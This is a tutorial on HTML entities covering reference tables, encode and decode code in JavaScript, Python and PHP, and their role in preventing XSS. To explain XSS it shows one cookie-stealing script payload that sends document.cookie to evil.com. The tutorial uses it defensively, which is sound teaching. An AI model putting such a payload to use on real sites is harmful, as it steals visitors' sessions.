HTML entities are one of the mechanisms the web quietly depends on. Without them, you couldn't display a less-than sign in your text, render accented characters reliably, or safely embed user-generated content. Every time a browser encounters &lt; and renders it as <, HTML entities are doing their job.
This guide covers the complete picture: how HTML entities work under the hood, the essential reference tables you'll use daily, encoding and decoding strategies, and the critical role entities play in preventing cross-site scripting (XSS) attacks.
An HTML entity is a sequence of characters that represents a single character that either can't be typed directly or has special meaning in HTML. They always start with an ampersand (&) and end with a semicolon (;).
When the browser parses HTML, it replaces each entity with its corresponding character before rendering. This means &amp; in your source code becomes & on screen, and &copy; becomes ©.
The HTML specification defines over 2,000 named entities (expanded significantly in HTML5), plus support for any Unicode character via numeric references.
There are three ways to write an HTML entity:
Human-readable names defined by the HTML specification:
&amp; → & (ampersand)
&lt; → < (less-than)
&gt; → > (greater-than)
&copy; → © (copyright)
&euro; → € (euro sign)
&nbsp; → (non-breaking space)
Named entities are preferred for readability and maintainability: any developer can understand &copy; at a glance.
Unicode code point in decimal, prefixed with &#:
&#38; → & (ampersand)
&#60; → < (less-than)
&#169; → © (copyright)
&#8364; → € (euro sign)
Unicode code point in hexadecimal, prefixed with &#x:
&#x26; → & (ampersand)
&#x3C; → < (less-than)
&#xA9; → © (copyright)
&#x20AC; → € (euro sign)
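As a quick check that the three notations are interchangeable, here is a minimal Python sketch. It uses the standard library's `html.unescape` to stand in for a browser's entity decoding; the helper name `numeric_references` is made up for this illustration.

```python
import html

# Three spellings of the copyright sign: named, decimal, hexadecimal.
forms = ["&copy;", "&#169;", "&#xA9;"]
decoded = [html.unescape(form) for form in forms]
print(decoded)  # every item is the same single character


def numeric_references(char: str) -> tuple[str, str]:
    """Return the decimal and hexadecimal references for one character."""
    code_point = ord(char)
    return f"&#{code_point};", f"&#x{code_point:X};"


print(numeric_references("€"))
```

Both numeric forms are derived from the same Unicode code point, so they work for any character, including those with no named entity.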
HTML uses <, >, &, ", and ' as syntax delimiters. If you need to display these characters as content (not markup), you must encode them:
<!-- Unescaped: a stray > usually renders, but a raw < or & can be misread as markup -->
<p>Use 5 > 3 to compare numbers</p>
<!-- Correct: the entity makes the intended content unambiguous -->
<p>Use 5 &gt; 3 to compare numbers</p>
While UTF-8 encoding handles most characters natively, entities provide a reliable fallback for characters that might be corrupted by encoding mismatches, email clients, or legacy systems:
&eacute; → é (e with acute)
&ntilde; → ñ (n with tilde)
&uuml; → ü (u with umlaut)
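One way to produce such a fallback is sketched below in Python. It relies on the built-in `xmlcharrefreplace` error handler, which emits decimal references rather than named ones; the function name `to_ascii_safe` is an assumption for this example.

```python
def to_ascii_safe(text: str) -> str:
    """Replace every non-ASCII character with a decimal character reference."""
    return text.encode("ascii", errors="xmlcharrefreplace").decode("ascii")


print(to_ascii_safe("café, niño, über"))
```

This only rewrites non-ASCII characters. Reserved characters such as < and & pass through untouched, so it complements HTML escaping rather than replacing it.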
HTML collapses multiple spaces into one. Entities let you insert precise whitespace and invisible characters:
&nbsp; → Non-breaking space (doesn't collapse)
&ensp; → En space (half em)
&emsp; → Em space (full em)
&thinsp; → Thin space
&zwj; → Zero-width joiner (for emoji sequences)
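Because these characters are invisible, it can help to inspect what each entity actually decodes to. The following Python sketch prints the code point and official Unicode name for each one, using only the standard library.

```python
import html
import unicodedata

whitespace_entities = ["&nbsp;", "&ensp;", "&emsp;", "&thinsp;", "&zwj;"]

for entity in whitespace_entities:
    char = html.unescape(entity)
    # Show the entity, its code point, and its Unicode name side by side.
    print(f"{entity:10} U+{ord(char):04X}  {unicodedata.name(char)}")
```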
These five entities are mandatory knowledge for every web developer:
| Character | Named | Decimal | Hex | Purpose |
|---|---|---|---|---|
| & | &amp; | &#38; | &#x26; | Ampersand |
| < | &lt; | &#60; | &#x3C; | Less than |
| > | &gt; | &#62; | &#x3E; | Greater than |
| " | &quot; | &#34; | &#x22; | Double quote |
| ' | &apos; | &#39; | &#x27; | Single quote (apostrophe) |
| Symbol | Named | Description |
|---|---|---|
| © | &copy; | Copyright |
| ® | &reg; | Registered trademark |
| ™ | &trade; | Trademark |
| € | &euro; | Euro |
| £ | &pound; | Pound sterling |
| ¥ | &yen; | Yen/Yuan |
| ¢ | &cent; | Cent |
| § | &sect; | Section sign |
| ± | &plusmn; | Plus-minus |
| × | &times; | Multiplication |
| ÷ | &divide; | Division |
| ° | &deg; | Degree |
| µ | &micro; | Micro sign |
| ¶ | &para; | Pilcrow/paragraph |
| … | &hellip; | Horizontal ellipsis |
| – | &ndash; | En dash |
| — | &mdash; | Em dash |
| ← | &larr; | Left arrow |
| → | &rarr; | Right arrow |
| ♥ | &hearts; | Heart |
| ✓ | &check; | Check mark |
| Symbol | Named | Description |
|---|---|---|
| ≤ | &le; | Less than or equal |
| ≥ | &ge; | Greater than or equal |
| ≈ | &asymp; | Approximately equal |
| ≠ | &ne; | Not equal |
| ∞ | &infin; | Infinity |
| √ | &radic; | Square root |
| ∑ | &sum; | Summation |
| π | &pi; | Pi |
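When a symbol is not in the tables above, the name can be looked up programmatically. The sketch below uses Python's `html.entities.codepoint2name`, which covers only the older HTML 4 names, and falls back to a decimal reference otherwise; `to_entity` is a hypothetical helper, not a standard function.

```python
from html.entities import codepoint2name


def to_entity(char: str) -> str:
    """Return a named entity for one character if HTML 4 defines one, else a decimal reference."""
    code_point = ord(char)
    name = codepoint2name.get(code_point)
    return f"&{name};" if name else f"&#{code_point};"


for symbol in "©≤π✓":
    print(symbol, to_entity(symbol))
```

The check mark has a name only in the newer HTML5 list, so this helper returns its numeric form. It is meant for single symbols, not for encoding whole strings.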
HTML encoding converts special characters into their entity equivalents. Decoding reverses the process. This is a fundamental operation in web development, especially when handling user input.
// Encode HTML entities
function escapeHTML(str) {
  return str
    .replace(/&/g, '&amp;') // must run first so later entities are not re-encoded
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}
// Decode HTML entities (browser only: relies on the DOM)
function unescapeHTML(str) {
  const el = document.createElement('textarea');
  el.innerHTML = str;
  return el.value;
}
// Note: TextEncoder converts strings to UTF-8 bytes and does not
// produce HTML entities. To clean untrusted HTML, use a sanitizer
// library like DOMPurify for comprehensive protection.
import html
# Encode
encoded = html.escape(user_input)  # converts < to &lt;, & to &amp;
# Decode
decoded = html.unescape(encoded)  # converts &lt; back to <
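To make the round trip concrete, here is a small self-contained Python sketch with a sample value for `user_input` (the string itself is invented for illustration). It also shows the `quote` parameter of `html.escape`, which controls whether quote characters are encoded.

```python
import html

user_input = "<a href='x'>Tom & Jerry</a>"  # sample input, assumed for this demo

# Default: quote=True, so both " and ' are encoded (safe inside attributes).
encoded = html.escape(user_input)
print(encoded)

# quote=False leaves quotes alone; only suitable for text between tags.
body_only = html.escape(user_input, quote=False)
print(body_only)

# Decoding restores the original string exactly.
assert html.unescape(encoded) == user_input
```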
// Encode
$encoded = htmlspecialchars($userInput, ENT_QUOTES, 'UTF-8');
// Decode
$decoded = htmlspecialchars_decode($encoded, ENT_QUOTES); // match the flags used for encoding
Cross-site scripting (XSS) is one of the most common web vulnerabilities. It occurs when an attacker injects malicious JavaScript into a web page by embedding it in user content that the page renders without sanitization.
Imagine a comment section where users can post messages. An attacker submits:
<script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>
If the server renders this directly into the page, the script executes in every visitor's browser, stealing their session cookies.
When you HTML-encode the attacker's input, the browser treats it as text, not markup:
&lt;script&gt;fetch(&#39;https://evil.com/steal?cookie=&#39; + document.cookie)&lt;/script&gt;
The browser displays this as literal text: <script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script> — no code execution.
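The same defense can be sketched on the server side in Python. The `render_comment` function and the surrounding `div` markup are assumptions for this example; a real application would normally rely on its template engine's auto-escaping instead.

```python
import html


def render_comment(comment: str) -> str:
    """Wrap an untrusted comment in markup, escaping it first."""
    return f'<div class="comment">{html.escape(comment)}</div>'


payload = "<script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>"
rendered = render_comment(payload)
print(rendered)
```

The rendered output contains no script element, only text that looks like one once the browser decodes the entities.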
HTML encoding is only one layer of defense. Combine it with Content-Security-Policy headers, input validation, and context-aware encoding (different escaping for JavaScript strings, URLs, and CSS).
The correct encoding depends on where user data appears in the document:
HTML content and attributes: entity encoding (&lt;, &gt;, &amp;, &quot;)
JavaScript strings: JavaScript escaping (\x3c, \x3e, \")
URLs: percent-encoding (%3C, %3E)
CSS: CSS escaping (\3c, \3e)
Use established libraries like DOMPurify (JavaScript), bleach (Python), or your framework's built-in escaping (React's JSX, Django's {{ var|escape }}, Laravel's Blade {{ }}) rather than rolling your own.
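To illustrate why one encoder does not fit every context, here is a rough Python sketch with one function per context. The function names are invented for this example, CSS escaping is left out, and the JavaScript variant is a simplified assumption (JSON encoding plus extra escapes for <, >, and &), not a replacement for a vetted library.

```python
import html
import json
from urllib.parse import quote


def for_html(value: str) -> str:
    """Escape for HTML text or a quoted attribute value."""
    return html.escape(value, quote=True)


def for_url_component(value: str) -> str:
    """Percent-encode a value for use as a single URL component."""
    return quote(value, safe="")


def for_js_string(value: str) -> str:
    """Produce a JavaScript string literal that cannot close a script element."""
    literal = json.dumps(value)
    return (
        literal.replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )


sample = '</script><b title="x">'
print(for_html(sample))
print(for_url_component(sample))
print(for_js_string(sample))
```

The same input yields three different outputs, and using the wrong one for a given context leaves the data either broken or exploitable.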
The five essential entities, &amp;, &lt;, &gt;, &quot;, and &apos;, should be second nature.
Avoid double encoding: encoding &amp; twice produces &amp;amp;, which displays as &amp; instead of &.
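The double-encoding pitfall is easy to reproduce. This short Python sketch escapes the same string twice and shows that a single round of decoding no longer recovers the original text.

```python
import html

original = "Tom & Jerry"
once = html.escape(original)   # correct: encoded exactly once
twice = html.escape(once)      # bug: the & of the entity is encoded again

print(once)
print(twice)
print(html.unescape(twice))    # what a browser would display
```

A common cause is escaping data before storing it and again when rendering. Escaping once, at output time, avoids the problem.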
HTML entities are a small but critical part of web development. They solve three fundamental problems: displaying reserved characters, representing Unicode characters reliably, and preventing XSS attacks. The five essential entities (&amp;, &lt;, &gt;, &quot;, &apos;) should be automatic in every developer's muscle memory. For everything else, keep a reference handy and let your framework's auto-escaping handle the heavy lifting. Understanding entities isn't just about knowing the syntax; it's about building secure, reliable web applications.